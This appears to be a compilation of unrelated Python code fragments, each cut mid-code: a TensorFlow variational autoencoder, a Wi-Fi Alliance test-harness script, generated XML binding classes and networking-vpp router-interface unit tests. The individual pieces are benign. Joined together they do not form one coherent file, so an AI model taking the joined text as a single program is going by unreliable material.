initializer=tf.truncated_normal_initializer(stddev=0.1))
self.biases_mean = tf.get_variable(
initializer=tf.zeros(shape=[1, self.num_lvs]),
name='biases')
# weights to estimate mean of normally distributed latent vars
self.z_mean = tf.add(
tf.matmul(z_enc[-1], self.weights_mean), self.biases_mean,
name='z_means')
with tf.variable_scope('log_vars'):
# initialize weights/biases for log vars of stochastic layer
self.weights_log_var = tf.get_variable(
shape=[self.layers_encoder[-1], self.num_lvs],
name='weights',
initializer=tf.truncated_normal_initializer(stddev=0.1))
self.biases_log_var = tf.get_variable(
initializer=tf.zeros(shape=[1, self.num_lvs]),
name='biases')
# estimating log of the variance is easier since the latent
# loss has a log determinant term
self.z_log_var = tf.add(
tf.matmul(z_enc[-1], self.weights_log_var),
self.biases_log_var,
name='z_log_vars')
# transform estimated mean and log variance into a sampled value
# of the latent state using z = mu + sigma*epsilon
self.z = tf.add(
self.z_mean,
tf.multiply(tf.sqrt(tf.exp(self.z_log_var)), self.eps))
# save summaries of means and log_vars
tf.summary.histogram('means', self.z_mean)
tf.summary.histogram('log_vars', self.z_log_var)
def _define_generator_network(self):
"""
Create a generator network to transform a random sample
in the latent space into an image
"""
self.weights_dec = []
self.biases_dec = []
z_dec = [self.z]
for layer in range(self.num_layers_dec):
with tf.variable_scope(str('layer_%01i' % layer)):
# initialize weights
if layer == 0:
in_size = self.num_lvs
else:
in_size = self.layers_decoder[layer - 1]
out_size = self.layers_decoder[layer]
self.weights_dec.append(tf.get_variable(
shape=[in_size, out_size],
name='weights',
initializer=tf.truncated_normal_initializer(stddev=0.1)))
# initialize biases
self.biases_dec.append(tf.get_variable(
initializer=tf.zeros(shape=[1, out_size]),
name='biases'))
# calculate layer activations
pre = tf.add(
tf.matmul(z_dec[layer], self.weights_dec[layer]),
self.biases_dec[layer])
post = self.act_func(pre)
z_dec.append(post)
# save summaries of layer activations
tf.summary.histogram('pre_act', pre)
tf.summary.histogram('post_act', post)
# define this for easier access later
self.x_recon = z_dec[-1]
def _define_loss(self):
"""Define loss function that will be used to optimize model params"""
# define reconstruction loss
loss_recon = 0.5 * tf.reduce_sum(tf.square(self.x_recon - self.x), 1)
# define latent loss
loss_latent = 0.5 * tf.reduce_sum(tf.exp(self.z_log_var)
+ tf.square(self.z_mean)
- 1 - self.z_log_var, 1)
# define cost
self.cost = tf.reduce_mean(loss_recon + loss_latent)
# save summaries of cost
tf.summary.scalar('cost', self.cost)
def _define_optimizer(self):
"""Define one step of the optimization routine"""
self.train_step = tf.train.AdamOptimizer(self.learning_rate). \
minimize(self.cost)
def train(
self,
sess,
data=None,
batch_size=128,
epochs_training=10,
epochs_disp=None,
epochs_ckpt=None,
epochs_summary=None,
output_dir=None):
"""Network training
Args:
sess (tf.Session object): current session object to run graph
data (DataReader object): input to network
batch_size (int, optional): batch size used by the gradient
descent-based optimizers
epochs_training (int, optional): number of epochs for gradient
descent-based optimizers
epochs_disp (int, optional): number of epochs between updates to
the console
epochs_ckpt (int, optional): number of epochs between saving
checkpoint files
epochs_summary (int, optional): number of epochs between saving
network summary information
output_dir (string, optional): absolute path for saving checkpoint
files and summary files; must be present if either epochs_ckpt
or epochs_summary is not 'None'.
Returns:
None
Raises:
InputError: If epochs_ckpt is not None and output_dir is None
InputError: If epochs_summary is not None and output_dir is None
"""
# check input
if data is None:
raise exc.InputError('data reader must be specified')
if epochs_ckpt is not None and output_dir is None:
raise exc.InputError('output_dir must be specified to save model')
if epochs_summary is not None and output_dir is None:
raise exc.InputError('output_dir must be specified to save ' +
'summaries')
# initialize file writers
if epochs_summary is not None:
test_writer = tf.summary.FileWriter(
os.path.join(output_dir, 'summaries', 'test'),
sess.graph)
| |
###################################################################
#
# Copyright (c) 2014 Wi-Fi Alliance
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER
# RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE
# USE OR PERFORMANCE OF THIS SOFTWARE.
#
###################################################################
from socket import *
from time import gmtime, strftime
import thread, time, Queue, os
import sys, time
from select import select
import logging
import re
import ctypes
import HTML
from xml.dom.minidom import Document
from XMLLogger import XMLLogger
VERSION = "4.2.0"
conntable = {}
retValueTable = {}
DisplayNameTable = {}
streamSendResultArray = []
streamRecvResultArray = []
streamInfoArray = []
runningPhase = '1'
testRunning = 0
threadCount = 0
resultPrinted = 0
ifcondBit = 1
iDNB = 0
iINV = 0
RTPCount = 1
#default command file path
uccPath = '..\\..\\cmds'
DUTFeatureInfoFile = "./log/DUTFeatureInfo.html"
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
FOREGROUND_BLUE = 0x01 # text color contains blue.
FOREGROUND_GREEN = 0x02 # text color contains green.
FOREGROUND_RED = 0x04 # text color contains red.
FOREGROUND_INTENSITY = 0x08 # text color is intensified.
#Define extra colours
FOREGROUND_WHITE = FOREGROUND_RED | FOREGROUND_BLUE | FOREGROUND_GREEN
FOREGROUND_YELLOW = FOREGROUND_RED | FOREGROUND_GREEN
FOREGROUND_CYAN = FOREGROUND_BLUE | FOREGROUND_GREEN
FOREGROUND_MAGENTA = FOREGROUND_RED | FOREGROUND_BLUE
BACKGROUND_BLUE = 0x10 # background color contains blue.
BACKGROUND_GREEN = 0x20 # background color contains green.
BACKGROUND_RED = 0x40 # background color contains red.
BACKGROUND_INTENSITY = 0x80 # background color is intensified.
std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
cSLog = ""
class classifiedLogs:
"""Global Handler for classified Logs"""
def __init__(self, name, fileName, msg=""):
self.name = name
self.fileD = open(fileName, 'a')
self.msg = msg
self.fileD.write("%s\n" % msg)
#time.strftime("%H-%M-%S_%b-%d-%y", time.localtime())
def log(self, msg):
"""Print out time and message into file"""
self.fileD.write("%s | %s \n" %(time.strftime("%b:%d:%Y-%H:%M:%S",
time.localtime()), msg))
def __str__(self):
return "%s:%s" %(self.fileName, self.msg)
def __del__(self):
self.fileD.close()
class streamInfo:
"""Returns string in formatted stream info"""
def __init__(self, streamID, IPAddress, pairID, direction,
trafficClass, frameRate, phase, RTPID):
self.streamID = streamID
self.IPAddress = IPAddress
self.pairID = pairID
self.direction = direction
self.trafficClass = trafficClass
self.frameRate = frameRate
self.phase = phase
self.status = -1
self.RTPID = RTPID
def __str__(self):
return "%-10s Stream ID = %s , IP Address = %s \n\r%-10s pairID = %s direction = %s \n\r%-10s frameRate =%s \n\r%-10s status =%s %s" % (' ', self.streamID, self.IPAddress, ' ', self.pairID, self.direction, ' ', self.frameRate, ' ', self.status, self.phase)
class streamResult:
"""Returns string in formatted stream result"""
def __init__(self, streamID, IPAddress, rxFrames, txFrames, rxBytes,
txBytes, phase):
self.streamID = streamID
self.IPAddress = IPAddress
self.rxFrames = rxFrames
self.txFrames = txFrames
self.rxBytes = rxBytes
self.txBytes = txBytes
self.phase = phase
#print 'self = %s streamID =%s' % (self,streamID)
def __str__(self):
return "%-10s RX %10s Bytes | TX %10s | Stream ID = %s" % (' ', self.rxBytes, self.txBytes, self.streamID)
# socket desc list to be used by select
waitsocks, readsocks, writesocks = [], [], []
#Multicast test
multicast = 0
def set_color(color, handle=std_out_handle):
"""(color) -> BOOL
Example: set_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
"""
bool = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color)
return bool
def setUCCPath(path):
"""Set absolute path of cmds or script location"""
global uccPath
uccPath = path
return
def scanner(fileobject, linehandler):
"""Scan file objects"""
for line in fileobject.readlines():
if not line: break
linehandler(line)
def sock_tcp_conn(ipaddr, ipport):
"""function for client socket connection set to blocking mode"""
global readsocks, waitsocks, deftimeout
buf = 2048
addr = (ipaddr, ipport)
mysock = socket(AF_INET, SOCK_STREAM)
try:
mysock.connect(addr)
except:
exc_info = sys.exc_info()
logging.error('Connection Error, IP = %s PORT = %s REASON = %s',
ipaddr, ipport, exc_info[1])
wfa_sys_exit("IP-%s:%s REASON = %s" % (ipaddr, ipport, exc_info[1]))
readsocks.append(mysock)
# Add the descriptor to select wait
waitsocks.append(mysock)
return mysock
def process_ipadd(line):
"""function to parse IP address and port number. Create socket connection if not already."""
global conntable
i = 0
addrlist = []
addrlist = line.split(':')
naddr = len(addrlist)
while i < naddr:
ip = addrlist[i].split(',', 1)
ipa = ip[0].split('=')[1] # ip adress
ipp = ip[1].split('=')[1] # ip port
logging.info('Connecting to - IP Addr = %s Port = %s', ipa, ipp)
sockhdlr = sock_tcp_conn(ipa, int(ipp))
conntable["%s:%s" %(ipa, ipp)] = sockhdlr
i = i+1
def close_conn():
global conntable
def printStreamResults():
"""Determines if WMM or WPA2 before printing results"""
global resultPrinted
ProgName = os.getenv("PROG_NAME")
if resultPrinted == 1:
return
XLogger.setTestResult("COMPLETED")
if ProgName == "P2P":
return
if "WPA2Test" in retValueTable:
logging.debug("WPA2 Results")
printStreamResults_WPA2()
else:
printStreamResults_WMM()
def printStreamResults_WPA2():
"""Prints stream results of WPA2"""
global resultPrinted
maxRTP = 1
set_color(FOREGROUND_WHITE)
if not streamSendResultArray:
resultPrinted = 0
else:
resultPrinted = 1
logging.info("\n\r %-7s --------------------STREAM RESULTS-----------------------" % "")
for s in streamSendResultArray:
sDisplayAddress = s.IPAddress
if s.IPAddress in DisplayNameTable:
sDisplayAddress = DisplayNameTable[s.IPAddress]
for r in streamInfoArray:
if r.streamID == s.streamID and r.IPAddress == s.IPAddress and r.phase == s.phase:
recv_id = r.pairID
trafficClass = r.trafficClass
phase = r.phase
break
for p in streamRecvResultArray:
pDisplayAddress = p.IPAddress
if p.IPAddress in DisplayNameTable:
pDisplayAddress = DisplayNameTable[p.IPAddress]
if p.streamID == recv_id and p.phase == s.phase:
logging.info("\n\r %-7s ----- %s --> %s -----" %
("", sDisplayAddress, pDisplayAddress))
logging.info("\n%s" % s)
if maxRTP < int(r.RTPID):
maxRTP = int(r.RTPID)
logging.info("\n%s" % p)
break
set_color(FOREGROUND_WHITE)
def printStreamResults_WMM():
"""Prints stream results of WMM"""
global resultPrinted
summaryList = {}
summaryStreamDisplay = {}
maxRTP = 1
i = 1
if not streamSendResultArray:
resultPrinted = 0
else:
resultPrinted = 1
logging.info("\n\r %-7s --------------------STREAM RESULTS-----------------------" % "")
for s in streamSendResultArray:
sDisplayAddress = s.IPAddress
if s.IPAddress in DisplayNameTable:
sDisplayAddress = DisplayNameTable[s.IPAddress]
for r in streamInfoArray:
if r.streamID == s.streamID and r.IPAddress == s.IPAddress and r.phase == s.phase:
recv_id = r.pairID
trafficClass = r.trafficClass
phase = r.phase
break
for p in streamRecvResultArray:
pDisplayAddress = p.IPAddress
if p.IPAddress in DisplayNameTable:
pDisplayAddress = DisplayNameTable[p.IPAddress]
if p.streamID == recv_id and p.phase == s.phase:
logging.info("\n\r %-7s ----- RTP_%s-%s ( %s --> %s ) PHASE = %s -----" %("", r.RTPID, trafficClass, sDisplayAddress, pDisplayAddress, phase))
logging.info("\n%s" % s)
summaryList.setdefault("%s:%s"%(int(r.RTPID), int(phase)), p.rxBytes)
summaryStreamDisplay.setdefault("%s:%s" % (int(r.RTPID), int(phase)), "RTP%-1s_%-10s [%s-->%s]" % (r.RTPID, trafficClass, sDisplayAddress, pDisplayAddress))
if maxRTP < int(r.RTPID):
maxRTP = int(r.RTPID)
logging.info("\n%s" % p)
break
set_color(FOREGROUND_WHITE)
logging.info("--------------------------SUMMARY----------------------------------")
logging.info(" %46s %10s | %10s" % ("|", "Phase1 (Bytes)", "Phase2 (Bytes)"))
logging.info("-------------------------------------------------------------------")
while i <= maxRTP:
str1 = ""
str2 = ""
stremDisplay = ""
if "%s:%s"%(i, "1") in summaryList:
str1 = summaryList["%s:%s" % (i, "1")]
stremDisplay = summaryStreamDisplay["%s:%s"%(i, "1")]
if "%s:%s"%(i, "2") in summaryList:
str2 = summaryList["%s:%s" % (i, "2")]
stremDisplay = summaryStreamDisplay["%s:%s"%(i, "2")]
logging.info("\n%6s %-43s %5s %10s | %10s" % (" ", stremDisplay, "|", str1, str2))
i = i + 1
set_color(FOREGROUND_INTENSITY)
def responseWaitThreadFunc(_threadID, command, addr, receiverStream):
global waitsocks, readsocks, writesocks, runningPhase, testRunning, streamInfoArray
logging.debug("responseWaitThreadFunc started %s" % testRunning)
while testRunning > 0:
readables, writeables, exceptions = select(readsocks, writesocks, [], 0.1)
for sockobj in readables:
if sockobj in waitsocks:
resp = sockobj.recv(2048)
resp_arr = resp.split(',')
for socks in conntable:
if sockobj == conntable[socks]:
responseIPAddress = socks
displayaddr = responseIPAddress
if responseIPAddress in DisplayNameTable:
displayaddr = DisplayNameTable[responseIPAddress]
logging.info("%-15s <--1 %s" % (displayaddr, resp))
# Check for send stream completion
if len(resp_arr) > 2:
if resp_arr[3] == '':
logging.error("NULL streamID returned from %s" % responseIPAddress)
continue
if resp_arr[2] == 'streamID':
logging.debug("STREAM COMPLETED = %s" % (resp_arr[3]))
# spliting the values of multiple streams
idx = resp_arr[3].strip()
idx = idx.split(' ')
sCounter = 0 # For multiple stream value returns
if resp_arr[7].split(' ')[sCounter] == '':
sCounter = 1
for i in idx:
txFrames = resp_arr[5].split(' ')[sCounter]
logging.debug(" TXFRAMES = %s" % txFrames)
i = ("%s;%s"%(i, responseIPAddress))
if txFrames != '0':
logging.info("%s (%-15s) <-- SEND Stream - %s Completed " % (displayaddr, responseIPAddress, i))
# Setting status complete
for p in streamInfoArray:
if p.IPAddress == responseIPAddress and p.streamID == i and p.phase == runningPhase:
p.status = 1
streamSendResultArray.append(streamResult(i, responseIPAddress, resp_arr[7].split(' ')[sCounter], resp_arr[5].split(' ')[sCounter], resp_arr[11].split(' ')[sCounter], resp_arr[9].split(' ')[sCounter], runningPhase))
else:
streamRecvResultArray.append(streamResult(i, responseIPAddress, resp_arr[7].split(' ')[sCounter], resp_arr[5].split(' ')[sCounter], resp_arr[11].split(' ')[sCounter], resp_arr[9].split(' ')[sCounter], runningPhase))
logging.info("%s (%-15s) <---- RECV Stream - %s Completed " % (displayaddr, responseIPAddress, i))
sCounter += 1
else:
logging.debug('Unwanted data on socket')
logging.debug("\n | |
gds_collector_=gds_collector_)
self.Errors = obj_
obj_.original_tagname_ = 'Errors'
elif nodeName_ == 'InformationalMessages':
obj_ = ArrayOfInformationalMessage.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.InformationalMessages = obj_
obj_.original_tagname_ = 'InformationalMessages'
# end class ResponseInformation
class ArrayOfError(GeneratedsSuper):
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, Error=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
if Error is None:
self.Error = []
else:
self.Error = Error
self.Error_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ArrayOfError)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ArrayOfError.subclass:
return ArrayOfError.subclass(*args_, **kwargs_)
else:
return ArrayOfError(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Error(self):
return self.Error
def set_Error(self, Error):
self.Error = Error
def add_Error(self, value):
self.Error.append(value)
def insert_Error_at(self, index, value):
self.Error.insert(index, value)
def replace_Error_at(self, index, value):
self.Error[index] = value
def hasContent_(self):
if (
self.Error
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='ArrayOfError', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ArrayOfError')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'ArrayOfError':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ArrayOfError')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ArrayOfError', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ArrayOfError'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='ArrayOfError', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Error_ in self.Error:
namespaceprefix_ = self.Error_nsprefix_ + ':' if (UseCapturedNS_ and self.Error_nsprefix_) else ''
Error_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Error', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Error':
obj_ = Error.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Error.append(obj_)
obj_.original_tagname_ = 'Error'
# end class ArrayOfError
class Error(GeneratedsSuper):
"""Error"""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, Code=None, Description=None, AdditionalInformation=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.Code = Code
self.Code_nsprefix_ = None
self.Description = Description
self.Description_nsprefix_ = None
self.AdditionalInformation = AdditionalInformation
self.AdditionalInformation_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, Error)
if subclass is not None:
return subclass(*args_, **kwargs_)
if Error.subclass:
return Error.subclass(*args_, **kwargs_)
else:
return Error(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Code(self):
return self.Code
def set_Code(self, Code):
self.Code = Code
def get_Description(self):
return self.Description
def set_Description(self, Description):
self.Description = Description
def get_AdditionalInformation(self):
return self.AdditionalInformation
def set_AdditionalInformation(self, AdditionalInformation):
self.AdditionalInformation = AdditionalInformation
def hasContent_(self):
if (
self.Code is not None or
self.Description is not None or
self.AdditionalInformation is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='Error', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('Error')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'Error':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='Error')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='Error', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='Error'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='Error', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Code is not None:
namespaceprefix_ = self.Code_nsprefix_ + ':' if (UseCapturedNS_ and self.Code_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%sCode>%s</%sCode>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.Code), input_name='Code')), namespaceprefix_ , eol_))
if self.Description is not None:
namespaceprefix_ = self.Description_nsprefix_ + ':' if (UseCapturedNS_ and self.Description_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%sDescription>%s</%sDescription>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.Description), input_name='Description')), namespaceprefix_ , eol_))
if self.AdditionalInformation is not None:
namespaceprefix_ = self.AdditionalInformation_nsprefix_ + ':' if (UseCapturedNS_ and self.AdditionalInformation_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%sAdditionalInformation>%s</%sAdditionalInformation>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.AdditionalInformation), input_name='AdditionalInformation')), namespaceprefix_ , eol_))
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Code':
value_ = child_.text
value_ = self.gds_parse_string(value_, node, 'Code')
value_ = self.gds_validate_string(value_, node, 'Code')
self.Code = value_
self.Code_nsprefix_ = child_.prefix
elif nodeName_ == 'Description':
value_ = child_.text
value_ = self.gds_parse_string(value_, node, 'Description')
value_ = self.gds_validate_string(value_, node, 'Description')
self.Description = value_
self.Description_nsprefix_ = child_.prefix
elif nodeName_ == 'AdditionalInformation':
value_ = child_.text
value_ = self.gds_parse_string(value_, node, 'AdditionalInformation')
value_ = self.gds_validate_string(value_, node, 'AdditionalInformation')
self.AdditionalInformation = value_
self.AdditionalInformation_nsprefix_ = child_.prefix
# end class Error
class ArrayOfInformationalMessage(GeneratedsSuper):
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, InformationalMessage=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
if InformationalMessage is None:
self.InformationalMessage = []
else:
self.InformationalMessage = InformationalMessage
self.InformationalMessage_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ArrayOfInformationalMessage)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ArrayOfInformationalMessage.subclass:
return ArrayOfInformationalMessage.subclass(*args_, **kwargs_)
else:
return ArrayOfInformationalMessage(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_InformationalMessage(self):
return self.InformationalMessage
def set_InformationalMessage(self, InformationalMessage):
self.InformationalMessage = InformationalMessage
def add_InformationalMessage(self, value):
self.InformationalMessage.append(value)
def insert_InformationalMessage_at(self, index, value):
self.InformationalMessage.insert(index, value)
def replace_InformationalMessage_at(self, index, value):
self.InformationalMessage[index] = value
def hasContent_(self):
if (
self.InformationalMessage
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='ArrayOfInformationalMessage', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ArrayOfInformationalMessage')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'ArrayOfInformationalMessage':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ArrayOfInformationalMessage')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ArrayOfInformationalMessage', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ArrayOfInformationalMessage'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='ArrayOfInformationalMessage', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for InformationalMessage_ in self.InformationalMessage:
namespaceprefix_ = self.InformationalMessage_nsprefix_ + ':' if (UseCapturedNS_ and self.InformationalMessage_nsprefix_) else ''
InformationalMessage_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='InformationalMessage', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'InformationalMessage':
obj_ = InformationalMessage.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.InformationalMessage.append(obj_)
obj_.original_tagname_ = 'InformationalMessage'
# end class ArrayOfInformationalMessage
class InformationalMessage(GeneratedsSuper):
"""InformationalMessage"""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, Code=None, Message=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.Code = Code
self.Code_nsprefix_ = None
self.Message = Message
self.Message_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, InformationalMessage)
if subclass is not None:
return subclass(*args_, **kwargs_)
if InformationalMessage.subclass:
return InformationalMessage.subclass(*args_, **kwargs_)
else:
return InformationalMessage(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Code(self):
return self.Code
def set_Code(self, Code):
self.Code = Code
def get_Message(self):
return self.Message
def set_Message(self, Message):
self.Message = Message
def | |
to create it in VPP.
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
with mock.patch.object(self.vpp.vpp, 'get_bridge_bvi',
return_value=None):
loopback_idx = self.vpp.ensure_router_interface_on_host(
port, router)
self.vpp.vpp.get_ifidx_mac_address(loopback_idx)
self.vpp.vpp.set_loopback_bridge_bvi.assert_called_once_with(
loopback_idx, 'fake_dom_id')
self.vpp.vpp.set_interface_vrf.assert_called_once_with(
loopback_idx, router['vrf_id'], router['is_ipv6'])
self.vpp.vpp.set_interface_ip.assert_called_once_with(
loopback_idx,
iface(router['gateway_ip'], router['prefixlen']))
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
def _test_create_router_interface_with_existing_bvi_and_ip(
self, m_network_on_host, port, router):
# Test repeat adding the same router interface.
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
with mock.patch.object(self.vpp.vpp, 'get_bridge_bvi',
return_value=5):
with mock.patch.object(
self.vpp.vpp, 'get_interface_ip_addresses',
return_value=[
iface(router['gateway_ip'], router['prefixlen'])
]):
with mock.patch.object(self.vpp.vpp, 'get_interface_vrf',
return_value=[]):
self.vpp.ensure_router_interface_on_host(port, router)
self.vpp.vpp.create_loopback.assert_not_called()
self.vpp.vpp.set_loopback_bridge_bvi.assert_not_called()
self.vpp.vpp.set_interface_vrf.assert_called_once_with(
5, router['vrf_id'], router['is_ipv6'])
self.vpp.vpp.set_interface_ip.assert_not_called()
@mock.patch(
